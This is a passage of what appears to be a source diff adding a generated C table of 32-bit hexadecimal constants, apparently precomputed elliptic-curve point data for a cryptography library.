UINT32_C(0xF75DBA6E), UINT32_C(0x242B2453), ++ UINT32_C(0x8FF75F79), UINT32_C(0x289BFED4), UINT32_C(0xE721EDEB) } }, ++ { { UINT32_C(0xC1390FA8), UINT32_C(0x083215A1), UINT32_C(0x6DCE8CE0), ++ UINT32_C(0x901D686A), UINT32_C(0x837073FF), UINT32_C(0x4AB1BA62), ++ UINT32_C(0x34BEABA5), UINT32_C(0x10C287AA), UINT32_C(0x46985239), ++ UINT32_C(0xB4931AF4), UINT32_C(0xB053C4DC), UINT32_C(0x07639899) }, ++ { UINT32_C(0xE721EECD), UINT32_C(0x29E7F44D), UINT32_C(0x57B3FF48), ++ UINT32_C(0x65817182), UINT32_C(0x5054E2E0), UINT32_C(0x198542E2), ++ UINT32_C(0x84616DE8), UINT32_C(0x923C9E15), UINT32_C(0xAD465BB9), ++ UINT32_C(0x2A9C15E1), UINT32_C(0x16319245), UINT32_C(0xD8D4EFC7) } }, ++ { { UINT32_C(0x9961A674), UINT32_C(0x72DC7943), UINT32_C(0xA0E13668), ++ UINT32_C(0x839A0A52), UINT32_C(0x334945EA), UINT32_C(0xD7A53FA9), ++ UINT32_C(0xE7AA25DB), UINT32_C(0xDB21DB77), UINT32_C(0x66E96DA3), ++ UINT32_C(0xB6675A7D), UINT32_C(0xE66F33C0), UINT32_C(0x2C31C406) }, ++ { UINT32_C(0x6EC7B9CB), UINT32_C(0x45020B62), UINT32_C(0x0391F267), ++ UINT32_C(0xFF46E9CD), UINT32_C(0x0FA2F221), UINT32_C(0x7DABD744), ++ UINT32_C(0x9D4A2A3E), UINT32_C(0x9A32364B), UINT32_C(0x52D2E47A), ++ UINT32_C(0xF0F84AE8), UINT32_C(0x888F488A), UINT32_C(0xD0B872BB) } }, ++ { { UINT32_C(0xC9790EEF), UINT32_C(0x531E4CEF), UINT32_C(0x2B8D1A58), ++ UINT32_C(0xF7B5735E), UINT32_C(0xEF568511), UINT32_C(0xB8882F1E), ++ UINT32_C(0x86A86DB3), UINT32_C(0xAFB08D1C), UINT32_C(0xF54DE8C7), ++ UINT32_C(0x88CB9DF2), UINT32_C(0x9A683282), UINT32_C(0xA44234F1) }, ++ { UINT32_C(0xA6E9AB2E), UINT32_C(0xBC1B3D3A), UINT32_C(0x87FC99EE), ++ UINT32_C(0xEFA071FB), UINT32_C(0xA102DC0F), UINT32_C(0xFA3C737D), ++ UINT32_C(0xD6A0CBD2), UINT32_C(0xDF3248A6), UINT32_C(0x1ECC1BF4), ++ UINT32_C(0x6E62A4FF), UINT32_C(0xC8F1BC17), UINT32_C(0xF718F940) } }, ++ { { UINT32_C(0x4F63F026), UINT32_C(0x2C8B0AAD), UINT32_C(0x50B253CC), ++ UINT32_C(0x2AFF6238), UINT32_C(0x10C4D122), UINT32_C(0xCAB3E942), ++ UINT32_C(0x07CD2816), UINT32_C(0x52B59F04), UINT32_C(0x982C41FC), ++ UINT32_C(0x22322803), UINT32_C(0x8CF50B19), UINT32_C(0x38844E66) }, ++ { UINT32_C(0xBE3264CD), UINT32_C(0x42A959F7), UINT32_C(0x6C983524), ++ UINT32_C(0xBDDC24BD), UINT32_C(0x462B8640), UINT32_C(0xA489EB0C), ++ UINT32_C(0x98029BE7), UINT32_C(0xB7C05092), UINT32_C(0xA1ADDC64), ++ UINT32_C(0xD5546B5F), UINT32_C(0xA0C655AF), UINT32_C(0xE7CAC1FC) } }, ++ { { UINT32_C(0x47636F97), UINT32_C(0x14547198), UINT32_C(0xEBCDCCFF), ++ UINT32_C(0x6FA67481), UINT32_C(0x395D3258), UINT32_C(0xC164872F), ++ UINT32_C(0xEE6ACDBC), UINT32_C(0xB8CECAFE), UINT32_C(0xA933F180), ++ UINT32_C(0x3FBFE5F3), UINT32_C(0x898C3B1E), UINT32_C(0xEC20CAC2) }, ++ { UINT32_C(0x87DA73F9), UINT32_C(0x6A031BEE), UINT32_C(0x5C5AF46E), ++ UINT32_C(0xD1E667D1), UINT32_C(0x1DC6EEF9), UINT32_C(0xCB3DC168), ++ UINT32_C(0x33D310C0), UINT32_C(0x2DD1BD94), UINT32_C(0x9207E438), ++ UINT32_C(0x0F78D493), UINT32_C(0xA99C0E75), UINT32_C(0xC233D544) } }, ++ { { UINT32_C(0x9E2A0113), UINT32_C(0x228F19F1), UINT32_C(0x0E1A5D37), ++ UINT32_C(0x58495BE5), UINT32_C(0x38D7F364), UINT32_C(0x97E08F69), ++ UINT32_C(0x510759B0), UINT32_C(0x1EC3BA3E), UINT32_C(0xE03CD40D), ++ UINT32_C(0x3682F19A), UINT32_C(0xF9E16D68), UINT32_C(0xC87745D8) }, ++ { UINT32_C(0x09A642EA), UINT32_C(0xFD527AB5), UINT32_C(0xF9C81F27), ++ UINT32_C(0x6308EEBD), UINT32_C(0x550C5D68), UINT32_C(0xFA9F666C), ++ UINT32_C(0x584AB153), UINT32_C(0xDEBA436F), UINT32_C(0x5B63E939), ++ UINT32_C(0x1D4861D3), UINT32_C(0xC9850221), UINT32_C(0x073BED9B) } }, ++ { { UINT32_C(0x8B171246), UINT32_C(0x802BCCF0), UINT32_C(0x733B072F), ++ UINT32_C(0xFFF7D15A), UINT32_C(0x4CBFA4EF), UINT32_C(0xEA386266), ++ UINT32_C(0xD635946B), UINT32_C(0x9E5B5073), UINT32_C(0xFA81BE95), ++ UINT32_C(0x16E9A979), UINT32_C(0xB14F701F), UINT32_C(0x41E8716E) }, ++ { UINT32_C(0x101A6719), UINT32_C(0x25782E0F), UINT32_C(0xC9D66959), ++ UINT32_C(0x442C4875), UINT32_C(0x2B85D153), UINT32_C(0x52D845D9), ++ UINT32_C(0x2E831117), UINT32_C(0xFF925138), UINT32_C(0x8E02434B), ++ UINT32_C(0x01B700CC), UINT32_C(0xEC0BAE3E), UINT32_C(0xD2DB7F8E) } }, ++ { { UINT32_C(0x966A4872), UINT32_C(0x1B225300), UINT32_C(0x566F537B), ++ UINT32_C(0x40C149BE), UINT32_C(0xCB680021), UINT32_C(0x3335F4D2), ++ UINT32_C(0x778E5F5F), UINT32_C(0x773D0263), UINT32_C(0x666FA9ED), ++ UINT32_C(0x1D9B7602), UINT32_C(0x2E6200CF), UINT32_C(0x52490A10) }, ++ { UINT32_C(0x961F290B), UINT32_C(0x8434C7DD), UINT32_C(0x64456446), ++ UINT32_C(0x773AC156), UINT32_C(0x47B712BB), UINT32_C(0x5E2BB789), ++ UINT32_C(0xBE0974AD), UINT32_C(0xFD3BCBFD), UINT32_C(0x791AD5D8), ++ UINT32_C(0x71AE9351), UINT32_C(0x6F4E1400), UINT32_C(0x1EE738BA) } }, ++ { { UINT32_C(0x0BE8E26E), UINT32_C(0x2FA428AB), UINT32_C(0xBB4CF9FC), ++ UINT32_C(0xFEFF0600), UINT32_C(0xB2EA5FB0), UINT32_C(0x76F25CA9), ++ UINT32_C(0x6835C5F4), UINT32_C(0xAB7FECF0), UINT32_C(0x19D5F328), ++ UINT32_C(0x649D0772), UINT32_C(0xACBCB12E), UINT32_C(0xABE7B895) }, ++ { UINT32_C(0xD69B1EA8), UINT32_C(0xF2D1031A), UINT32_C(0xC60B0BBB), ++ UINT32_C(0x46065D5D), UINT32_C(0x85D798FF), UINT32_C(0xB0908DC1), ++ UINT32_C(0xD2C9B18A), UINT32_C(0x4E2420F0), UINT32_C(0xD30432A2), ++ UINT32_C(0x6B3A9BDD), UINT32_C(0xC9B134AD), UINT32_C(0x501C3383) } }, ++ { { UINT32_C(0x98A21284), UINT32_C(0x608F0967), UINT32_C(0x059CCEDE), ++ UINT32_C(0x5361BE86), UINT32_C(0xAFD87EF7), UINT32_C(0x3A40655C), ++ UINT32_C(0x59083AA2), UINT32_C(0x03CF3117), UINT32_C(0xB6C366D9), ++ UINT32_C(0x57DB5F61), UINT32_C(0x6DD0D232), UINT32_C(0x29DC275B) }, ++ { UINT32_C(0x8FA67501), UINT32_C(0xBDAB24DD), UINT32_C(0x65D08C37), ++ UINT32_C(0x5928F775), UINT32_C(0x645D466A), UINT32_C(0x9448A856), ++ UINT32_C(0xC0E927A5), UINT32_C(0x6E6B5E2E), UINT32_C(0xE80C6871), ++ UINT32_C(0xE884D546), UINT32_C(0x53A9A851), UINT32_C(0x10C881C9) } }, ++ { { UINT32_C(0x9B627AA5), UINT32_C(0x35505374), UINT32_C(0x7976677B), ++ UINT32_C(0xE7CA1B57), UINT32_C(0x4976CE17), UINT32_C(0x81239712), ++ UINT32_C(0x96DA31B9), UINT32_C(0x96E9080B), UINT32_C(0xCC64AA1F), ++ UINT32_C(0x458254AB), UINT32_C(0x48E674C9), UINT32_C(0xFEFF6821) }, ++ { UINT32_C(0x021F1488), UINT32_C(0x8772F37A), UINT32_C(0xAB56345C), ++ UINT32_C(0x2E274E18), UINT32_C(0x29823B76), UINT32_C(0x7C7BE61C), ++ UINT32_C(0x9EEFB39E), UINT32_C(0x275DB7B2), UINT32_C(0xBF5CBCEF), ++ UINT32_C(0x83B10ED4), UINT32_C(0x518E5183), UINT32_C(0x40D7F5B4) } }, ++ { { UINT32_C(0xF960B41B), UINT32_C(0x315CCC01), UINT32_C(0x1D99E722), ++ UINT32_C(0x90B417C9), UINT32_C(0x013463E0), UINT32_C(0x84AFAA0D), ++ UINT32_C(0x13E6D9E1), UINT32_C(0xF133C5D8), UINT32_C(0x525B7430), ++ UINT32_C(0xD95C6ADC), UINT32_C(0x7A25106A), UINT32_C(0x082C61AD) }, ++ { UINT32_C(0xBA1CE179), UINT32_C(0xABC1966D), UINT32_C(0xA5DB529A), ++ UINT32_C(0xE0578B77), UINT32_C(0xEC84107D), UINT32_C(0x10988C05), ++ UINT32_C(0x1B207F83), UINT32_C(0xFCADE5D7), UINT32_C(0xC5BA83DB), ++ UINT32_C(0x0BEB6FDB), UINT32_C(0x57537E34), UINT32_C(0x1C39B86D) } }, ++ }, ++ { ++ { { UINT32_C(0x2A7AECED), UINT32_C(0x5B0B5D69), UINT32_C(0x01DC545F), ++ UINT32_C(0x4C03450C), UINT32_C(0x404A3458), UINT32_C(0x72AD0A4A), ++ UINT32_C(0x9F467B60), UINT32_C(0x1DE8E255), UINT32_C(0x90634809), ++ UINT32_C(0xA4B35705), UINT32_C(0x706F0178), UINT32_C(0x76F30205) }, ++ { UINT32_C(0x4454F0E5), UINT32_C(0x588D21AB), UINT32_C(0x64134928), ++ UINT32_C(0xD22DF549), UINT32_C(0x241BCD90), UINT32_C(0xF4E7E73D), ++ UINT32_C(0x2FACC7CC), UINT32_C(0xB8D8A1D2), UINT32_C(0x1D25D2A0), ++ UINT32_C(0x483C35A7), UINT32_C(0x1EF9F608), UINT32_C(0x7F8D2545) } }, ++ { { UINT32_C(0x54EBC926), UINT32_C(0xCB51F039), UINT32_C(0xB8D4A7BB), ++ UINT32_C(0xE235D356), UINT32_C(0xB41FE1A6), UINT32_C(0x93C8FAFA), ++ UINT32_C(0xA719F254), UINT32_C(0x6297701D), UINT32_C(0x644F5CDE), ++ UINT32_C(0x6E9165BC), UINT32_C(0x0C11C542), UINT32_C(0x6506329D) }, ++ { UINT32_C(0xA92B4250), UINT32_C(0xA2564809), UINT32_C(0x889C2E3E), ++ UINT32_C(0x0E9AC173), UINT32_C(0x22B1D1BE), UINT32_C(0x286A5926), ++ UINT32_C(0x6ECDD041), UINT32_C(0x86A3D752), UINT32_C(0x649F9524), ++ UINT32_C(0x4B867E0A), UINT32_C(0x0629CB0F), UINT32_C(0x1FE7D95A) } }, ++ { { UINT32_C(0xCA5BAF54), UINT32_C(0xF4F66843), UINT32_C(0xEFE7DB78), ++ UINT32_C(0x298DB357), UINT32_C(0x7365712F), UINT32_C(0xF607E86E), ++ UINT32_C(0x8A822BC0), UINT32_C(0xD5882298), UINT32_C(0xC61299B3), ++ UINT32_C(0x2CFBD63A), UINT32_C(0x67167B1A), UINT32_C(0x6F713D9B) }, ++ { UINT32_C(0xDE0B077A), UINT32_C(0x750F673F), UINT32_C(0xEE2178DA), ++ UINT32_C(0x07482708), UINT32_C(0x69123C75), UINT32_C(0x5E6D5BD1), ++ UINT32_C(0xEAB99B37), UINT32_C(0x6A93D1B6), UINT32_C(0x8CAEC6A3), ++ UINT32_C(0x6EF4F7E6), UINT32_C(0xCF3ED818), UINT32_C(0x7BE411D6) } }, ++ { { UINT32_C(0x63A0A7D2), UINT32_C(0xF92B3073), UINT32_C(0x881DC8CF), ++ UINT32_C(0x32DA431C), UINT32_C(0xC578E3A3), UINT32_C(0xE51BD5ED), ++ UINT32_C(0x9587FA22), UINT32_C(0xEFDA70D2), UINT32_C(0x9B2EBA85), ++ UINT32_C(0xCFEC1708), UINT32_C(0xAF7BA530), UINT32_C(0x6AB51A4B) }, ++ { UINT32_C(0x98174812), UINT32_C(0x5AC155AE), UINT32_C(0xCCB076E3), ++ UINT32_C(0xCAF07A71), UINT32_C(0xC38718A7), UINT32_C(0x280E86C2), ++ UINT32_C(0xD63745B7), UINT32_C(0x9D12DE73), UINT32_C(0xBF8A79AA), ++ UINT32_C(0x0E8EA855), UINT32_C(0xBD705BF7), UINT32_C(0x5EB2BED8) } }, ++ { { UINT32_C(0xAE16DE53), UINT32_C(0x33FE9578), UINT32_C(0x10BEC902), ++ UINT32_C(0x3AE85EB5), UINT32_C(0x44AF850E), UINT32_C(0xC4F49658), ++ UINT32_C(0x087DD658), UINT32_C(0x6EA222B3), UINT32_C(0xA51F1447), ++ UINT32_C(0xB255E6FD), UINT32_C(0x117E3F48), UINT32_C(0xB35E4997) }, ++ { UINT32_C(0x05616CA1), UINT32_C(0x562E813B), UINT32_C(0x8A61E156), ++ UINT32_C(0xDF5925D6), UINT32_C(0x571C728B), UINT32_C(0xB2FA8125), ++ UINT32_C(0xA2F2D1CF), UINT32_C(0x00864805), UINT32_C(0x1BCCB6FF), ++ UINT32_C(0x2DC26F41), UINT32_C(0x63AE37DD), UINT32_C(0xEBD5E093) } }, ++ { { UINT32_C(0x0A285611), UINT32_C(0xD2D68BB3), UINT32_C(0xDC8378F2), ++ UINT32_C(0x3EAE7596), UINT32_C(0x6CC688A3), UINT32_C(0x2DC6CCC6), ++ UINT32_C(0x011F5DFB), UINT32_C(0xC45E5713), UINT32_C(0x62D34487), ++ UINT32_C(0x6B9C4F6C), UINT32_C(0x1FC65551), UINT32_C(0xFAD6F077) }, ++ { UINT32_C(0x62B23B52), UINT32_C(0x5E3266E0), UINT32_C(0xE98F4715), ++ UINT32_C(0xF1DAF319), UINT32_C(0x3ED0AE83), UINT32_C(0x064D12EA), ++ UINT32_C(0x564125CB), UINT32_C(0x5CCF9326), UINT32_C(0xC63C1E9F), ++ UINT32_C(0x09057022), UINT32_C(0xDC9B5D2E), UINT32_C(0x7171972C) } }, ++ { { UINT32_C(0xEABD21B2), UINT32_C(0x2364FD9A), UINT32_C(0x9174AD6D), ++ UINT32_C(0x3CE5F4BB), UINT32_C(0xB38688C0), UINT32_C(0xA4D6D5D0), ++ UINT32_C(0x6D87FD7D), UINT32_C(0x2292A2D2), UINT32_C(0x4CA02E54), ++ UINT32_C(0x2A7D1B53), UINT32_C(0xB4185715), UINT32_C(0x7BEE6E7E) }, ++ { UINT32_C(0x8FC63ACD), UINT32_C(0x73E54609), UINT32_C(0x4064E09D), ++ UINT32_C(0xF4D93A12), UINT32_C(0x2B92DAA5), UINT32_C(0xD20E157A), ++ UINT32_C(0xC4B81A00), UINT32_C(0x90D125DB), UINT32_C(0x7682DE13), ++ UINT32_C(0xCB951C9E), UINT32_C(0x27987545), UINT32_C(0x1ABE58F4) } }, ++ { { UINT32_C(0x30C70C8D), UINT32_C(0x6D351640), UINT32_C(0xCE2361B8), ++ UINT32_C(0x8047D811), UINT32_C(0xDF8E2C81), UINT32_C(0x3F8B3D4F), ++ UINT32_C(0x33FA1F6C), UINT32_C(0x5D595477), UINT32_C(0xE29B8A91), ++ UINT32_C(0xF769FE5A), UINT32_C(0xD737B2A2), UINT32_C(0x26F0E606) }, ++ { UINT32_C(0xB8B31C6A), UINT32_C(0x70CBFA5D), UINT32_C(0x863D3AEA), ++ UINT32_C(0x0F883B4A), UINT32_C(0xE386AE2F), UINT32_C(0x156A4479), ++ UINT32_C(0xADE8A684), UINT32_C(0xA17A2FCD), UINT32_C(0xE2A7E335), ++ UINT32_C(0x78BDF958), UINT32_C(0x3B9E3041), UINT32_C(0xD1B4E673) } }, ++ { { UINT32_C(0x449A6D11), UINT32_C(0x1EAF48EC), UINT32_C(0x6D2FA7B9), ++ UINT32_C(0x6B94B8E4), UINT32_C(0x728E4C1B), UINT32_C(0x1D75D269), ++ UINT32_C(0xDD304E2C), UINT32_C(0x91123819), UINT32_C(0x88804F4B), ++ UINT32_C(0x0B34CAE3), UINT32_C(0xC5495E9A), UINT32_C(0x2BA192FB) }, ++ { UINT32_C(0xFF4D24BF), UINT32_C(0xC93FF6EF), UINT32_C(0x0342BA78), ++ UINT32_C(0xF8C2C0B0), UINT32_C(0x831EB94C), UINT32_C(0x8041F769), ++ UINT32_C(0x7782985E), UINT32_C(0x35310074), UINT32_C(0x3AF84E83), ++ UINT32_C(0xC755320B), UINT32_C(0x6F497E7F), UINT32_C(0x384B6D26) } }, ++ { { UINT32_C(0x17E6BD17), UINT32_C(0xEF92CD59), UINT32_C(0xA426965C), ++ UINT32_C(0xA087305B), UINT32_C(0xAC47F773), UINT32_C(0x13895CE7), ++ UINT32_C(0xE0BB2867), UINT32_C(0xB85F2A9F), UINT32_C(0x7CD7C58E), ++ UINT32_C(0x2926E6AA), UINT32_C(0x450459C5), UINT32_C(0xE544EDA6) }, ++ { UINT32_C(0xB90A9849), UINT32_C(0x73DBC351), UINT32_C(0x848EBE86), ++ UINT32_C(0x961183F6), UINT32_C(0x80534712), UINT32_C(0xC45BB210), ++ UINT32_C(0xA654D9A3), UINT32_C(0x379D08D7), UINT32_C(0xBD3FFA9C), ++ UINT32_C(0x5B97CEF2), UINT32_C(0xDDC2FCE5), UINT32_C(0x0F469F34) } }, ++ { { UINT32_C(0x0642F38D), UINT32_C(0x6D146108), UINT32_C(0xD21EB887), ++ UINT32_C(0x055171A0), UINT32_C(0xD0DCEB28), UINT32_C(0x28DFFAB4), ++ UINT32_C(0x98DE9CCD), UINT32_C(0x0D0E6312), UINT32_C(0x118C3C3F), ++ UINT32_C(0x750A9156), UINT32_C(0xB049D799), UINT32_C(0x8C1F1390) }, ++ { UINT32_C(0x439607C5), UINT32_C(0xE4823858), UINT32_C(0x5C111EAB), ++ UINT32_C(0x947E9BA0), UINT32_C(0xA355DF2E), UINT32_C(0x39C95616), ++ UINT32_C(0x10E54BDA), UINT32_C(0xF5F6B98E), UINT32_C(0x142B876A), ++ UINT32_C(0xB0E0B33D), UINT32_C(0xEA18C90C), UINT32_C(0x71197D73) } }, ++ { { UINT32_C(0xF52BE819), UINT32_C(0x36A5139D), UINT32_C(0x29A45D2B), ++ UINT32_C(0xF60DDF34), UINT32_C(0xE9220E34), UINT32_C(0x0727EFEC), ++ UINT32_C(0x4EF7F446), UINT32_C(0x431D3386), UINT32_C(0xFCC4962C), ++ UINT32_C(0xC3165A64), UINT32_C(0xD64362BB), UINT32_C(0xB7D926E1) }, ++ { UINT32_C(0xD45F9350), UINT32_C(0x216BC61F), UINT32_C(0xBBAED815), ++ UINT32_C(0xA974CB2F), UINT32_C(0x86FB2F76), UINT32_C(0x31DF342D), ++ UINT32_C(0x01D78314), UINT32_C(0x3AB67E05), UINT32_C(0xDEE33ED2), ++ UINT32_C(0x7AA951E0), UINT32_C(0xCEC78D94), UINT32_C(0x318FBBBD) } }, ++ { { UINT32_C(0xB8FE0204), UINT32_C(0xAD7EFB65), UINT32_C(0x230AB7F7), ++ UINT32_C(0x0432E1C5), UINT32_C(0x9C967400), UINT32_C(0x7563A62D), ++ UINT32_C(0x3524D4FF), UINT32_C(0xD88B9C74), UINT32_C(0xF1A823E3), ++ UINT32_C(0x16A1991C), UINT32_C(0xFA6F0FFB), UINT32_C(0xCF2F9BFE) }, ++ { UINT32_C(0xA50CA61F), UINT32_C(0x55AAA946), UINT32_C(0xFED4CAB3), ++ UINT32_C(0x8CBBD3C8), UINT32_C(0x7651365A), UINT32_C(0x03A0FAB8), ++ UINT32_C(0x62DC3913), UINT32_C(0x46B5234B), UINT32_C(0xB558CBBD), ++ UINT32_C(0xFD875B28), UINT32_C(0x11CEB361), UINT32_C(0xA48EC3AE) } }, ++ { { UINT32_C(0xB3ADBD8B), UINT32_C(0x5DD131A1), UINT32_C(0x29B45EF8), ++ UINT32_C(0xF9FBCA3A), UINT32_C(0x9341EE18), UINT32_C(0x02204866), ++ UINT32_C(0x83BF9618), UINT32_C(0x8D13B895), UINT32_C(0xE807459C), ++ UINT32_C(0x0E395BAE), UINT32_C(0xB190E7DB), UINT32_C(0xB9C110CC) }, ++ { UINT32_C(0x25D25063), UINT32_C(0xA0DC3452), UINT32_C(0x02371462), ++ UINT32_C(0x2FB78EC8), UINT32_C(0x8975C2D5), UINT32_C(0xC3A9E7BB), ++ UINT32_C(0x85A78264), UINT32_C(0x94666872), UINT32_C(0x8029AA92), ++ UINT32_C(0x480D2CC2), UINT32_C(0x5655726D), UINT32_C(0x237086C7) } }, ++ { { UINT32_C(0x65EB9EEE), UINT32_C(0x197F14BB), UINT32_C(0x9F12E5FD), ++ UINT32_C(0xFC93125C), UINT32_C(0x8BFBAE5E), UINT32_C(0x9C20BC53), ++ UINT32_C(0x4BC053BA), UINT32_C(0xB35E2154), UINT32_C(0x21C3898E), ++ UINT32_C(0xE5FA9CC7), UINT32_C(0xD42F950F), UINT32_C(0x502D72FF) }, ++ { UINT32_C(0xD1EB8C31), UINT32_C(0x6812D38A), UINT32_C(0x080D30BB), ++ UINT32_C(0x1F77F3F1), UINT32_C(0x5A8B1E98), UINT32_C(0x18D12833), ++ UINT32_C(0x299196CE), UINT32_C(0x7FD39FA9), UINT32_C(0xCF4ED6D6), ++ UINT32_C(0xFB8C9F11), UINT32_C(0xD6363194), UINT32_C(0x4C00F604) } }, ++ { { UINT32_C(0xFA2A21C2), UINT32_C(0x5C8AFCF9), UINT32_C(0x1928D133), ++ UINT32_C(0x71CBF282), UINT32_C(0x42B29506), UINT32_C(0x56BEF28E), ++ UINT32_C(0x70323DE2), UINT32_C(0xAFBA250C), UINT32_C(0x7DED2C30), ++ UINT32_C(0x3FE208D1), UINT32_C(0xCE9AA598), UINT32_C(0xBD2CD213) }, ++ { UINT32_C(0xCFEED070), UINT32_C(0x52C5EC52), UINT32_C(0xD3DA336B), ++ UINT32_C(0x0A7223E7), UINT32_C(0xCE156B46), UINT32_C(0x7156A4ED), ++ UINT32_C(0xED7E6159), UINT32_C(0x9AF6C499), UINT32_C(0x13C029AD), ++ UINT32_C(0x9D7A6797), UINT32_C(0x9018DC77), UINT32_C(0xE5B5C924) } }, ++ }, ++ { ++ { { UINT32_C(0xDE1E4E55), UINT32_C(0x3F2EFF53), UINT32_C(0xE4D3ECC4), ++ UINT32_C(0x6B749943), UINT32_C(0x0DDE190D), UINT32_C(0xAF10B18A), ++ UINT32_C(0xA26B0409), UINT32_C(0xF491B98D), UINT32_C(0xA2B1D944), ++ UINT32_C(0x66080782), UINT32_C(0x97E8C541), UINT32_C(0x59277DC6) }, ++ { UINT32_C(0x006F18AA), UINT32_C(0xFDBFC5F6), UINT32_C(0xFADD8BE1), ++ UINT32_C(0x435D165B), UINT32_C(0x57645EF4), UINT32_C(0x8E5D2638), ++ UINT32_C(0xA0258363), UINT32_C(0x31BCFDA6), UINT32_C(0xD35D2503), ++ UINT32_C(0xF5330AB8), UINT32_C(0xC7CAB285), UINT32_C(0xB71369F0) } }, ++ { { UINT32_C(0x40ACC5A8), UINT32_C(0xE6A19DCC), UINT32_C(0xDBC6DBF8), ++ UINT32_C(0x1C3A1FF1), UINT32_C(0xC6455613), UINT32_C(0xB4D89B9F), ++ UINT32_C(0xA7390D0E), UINT32_C(0x6CB0FE44), UINT32_C(0x59EA135A), ++ UINT32_C(0xADE197A4), UINT32_C(0x20680982), UINT32_C(0xDA6AA865) }, ++ { UINT32_C(0x5A442C1B), UINT32_C(0x03DB9BE9), UINT32_C(0x2BFB93F2), ++ UINT32_C(0x221A2D73), UINT32_C(0x753C196C), UINT32_C(0x44DEE8D4), ++ UINT32_C(0x0B7C6FF5), UINT32_C(0x59ADCC70), UINT32_C(0x4CA1B142), ++ UINT32_C(0xC6260EC2), UINT32_C(0x46CBD4F2), UINT32_C(0x4C3CB5C6) } }, ++ { { UINT32_C(0xA417111F), UINT32_C(0x8A15D6FE), UINT32_C(0x71D93FCC), ++ UINT32_C(0xFE4A16BD), UINT32_C(0x55BBE732), UINT32_C(0x7A7EE38C), ++ UINT32_C(0x1FF94A9D), UINT32_C(0xEFF146A5), UINT32_C(0xDD585AB5), ++ UINT32_C(0xE572D13E), UINT32_C(0x06491A5D), UINT32_C(0xD879790E) }, ++ { UINT32_C(0x2A58CB2E), UINT32_C(0x9C84E1C5), UINT32_C(0x6C938630), ++ UINT32_C(0xD79D1374), UINT32_C(0x385F06C7), UINT32_C(0xDB12CD9B), ++ UINT32_C(0x7A7759C3), UINT32_C(0x0C93EB97), UINT32_C(0x683BD706), ++ UINT32_C(0xF1F5B0FE), UINT32_C(0x85EC3D50), UINT32_C(0x541E4F72) } }, ++ { { UINT32_C(0x81833608), UINT32_C(0x9A0E1535), UINT32_C(0x6E2833AC), ++ UINT32_C(0x5CCE871E), UINT32_C(0xFB29777C), UINT32_C(0xC17059EA), ++ UINT32_C(0xE354CAFD), UINT32_C(0x7E40E5FA), UINT32_C(0x4D07C371), ++ UINT32_C(0x9CF59405), UINT32_C(0xA71C3945), UINT32_C(0x64CE36B2) }, ++ { UINT32_C(0x56CAF487), UINT32_C(0x69309E96), UINT32_C(0x1AE3454B), ++ UINT32_C(0x3D719E9F), UINT32_C(0xE25823B6), UINT32_C(0xF2164070), ++ UINT32_C(0x0BC27359), UINT32_C(0xEAD851BD), UINT32_C(0xB0925094), ++ UINT32_C(0x3D21BFE8), UINT32_C(0x34A97F4E), UINT32_C(0xA783B1E9) } }, ++ { { UINT32_C(0x9546491A), UINT32_C(0x406B0C26), UINT32_C(0xF293C4E5), ++ UINT32_C(0x9E5E15E2), UINT32_C(0x15B164DB), UINT32_C(0xC60D6413), ++ UINT32_C(0x0C75A78E), UINT32_C(0x0DA46F53), UINT32_C(0xEA0C656B), ++ UINT32_C(0x7C599BB7), UINT32_C(0x1B1A8122), UINT32_C(0x0F07A512) }, ++ { UINT32_C(0x15172686), UINT32_C(0x14C7204A), UINT32_C(0x5165625D), ++ UINT32_C(0x8FAEDFF8), UINT32_C(0x37AEDE40), UINT32_C(0x20F260CE), ++ UINT32_C(0x8F357FFE), UINT32_C(0xC81F771E), UINT32_C(0xB0912557), ++ UINT32_C(0x25499197), UINT32_C(0x4C739C74), UINT32_C(0x736197DC) } }, ++ { { UINT32_C(0x381B3462), UINT32_C(0x6151BAB1), UINT32_C(0x43DBD344), ++ UINT32_C(0x27E5A078), UINT32_C(0xA1C3E9FB), UINT32_C(0x2CB05BD6), ++ UINT32_C(0x27CF2A11), UINT32_C(0x2A759760), UINT32_C(0xFF43E702), ++ UINT32_C(0x0ADCF9DB), UINT32_C(0x1F484146), UINT32_C(0x4BBF03E2) }, ++ { UINT32_C(0x55B6521A), UINT32_C(0x0E74997F), UINT32_C(0xADE17086), ++ UINT32_C(0x15629231), UINT32_C(0x7493FC58), UINT32_C(0x7F143E86), ++ UINT32_C(0xAF8B9670), UINT32_C(0x60869095), UINT32_C(0x7E524869), ++ UINT32_C(0x482CFCD7), UINT32_C(0x1D454756), UINT32_C(0x9E8060C3) } }, ++ { { UINT32_C(0xC88B4D3B), UINT32_C(0xE495747A), UINT32_C(0xAE8A948F), ++ UINT32_C(0xB7559835), UINT32_C(0xDEB56853), UINT32_C(0x67EEF3A9), ++ UINT32_C(0x9DEE5ADF), UINT32_C(0x0E20E269), UINT32_C(0x61F0A1AA), ++ UINT32_C(0x9031AF67), UINT32_C(0x683402BC), UINT32_C(0x76669D32) }, ++ { UINT32_C(0x06718B16), UINT32_C(0x90BD2313), UINT32_C(0x864EFDAC), ++ UINT32_C(0xE1B22A21), UINT32_C(0x6620089F), UINT32_C(0xE4FFE909), ++ UINT32_C(0x3428E2D9), UINT32_C(0xB84C842E), UINT32_C(0xFE3871FC), ++ UINT32_C(0x0E28C880), UINT32_C(0x3F21C200), UINT32_C(0x8932F698) } }, ++ { { UINT32_C(0x6C90EA5D), UINT32_C(0x603F00CE), UINT32_C(0x40A2F693), ++ UINT32_C(0x64739307), UINT32_C(0x2174E517), UINT32_C(0xAF65148B), ++ UINT32_C(0xF784AE74), UINT32_C(0x162FC2CA), UINT32_C(0x4D5F6458), ++ UINT32_C(0x0D9A8825), UINT32_C(0x43AACE93), UINT32_C(0x0C2D5861) }, ++ { UINT32_C(0x9F73CBFC), UINT32_C(0xBF1EADDE), UINT32_C(0x9C68BBCA), ++ UINT32_C(0xDE9C34C0), UINT32_C(0x67EF8A1A), UINT32_C(0x6D95602D), ++ UINT32_C(0xA791B241), UINT32_C(0x0AF2581B), UINT32_C(0x12CAD604), ++ UINT32_C(0x14F77361), UINT32_C(0xE2ACD1AD), UINT32_C(0x19F2354D) } }, ++ { { UINT32_C(0x0D60F263), UINT32_C(0x272F78F6), UINT32_C(0x208FD785), ++ UINT32_C(0xE7A8F4AF), UINT32_C(0x36554F2C), UINT32_C(0x10E191C6), ++ UINT32_C(0xFD5CD0B3), UINT32_C(0x06D88551), UINT32_C(0x57069C27), ++ UINT32_C(0x29BF8568), UINT32_C(0x28AA6FAD), UINT32_C(0x3CE7ECD8) }, ++ { UINT32_C(0xE9F1A1D8), UINT32_C(0x7D8A92D0), UINT32_C(0xD30B5725), ++ 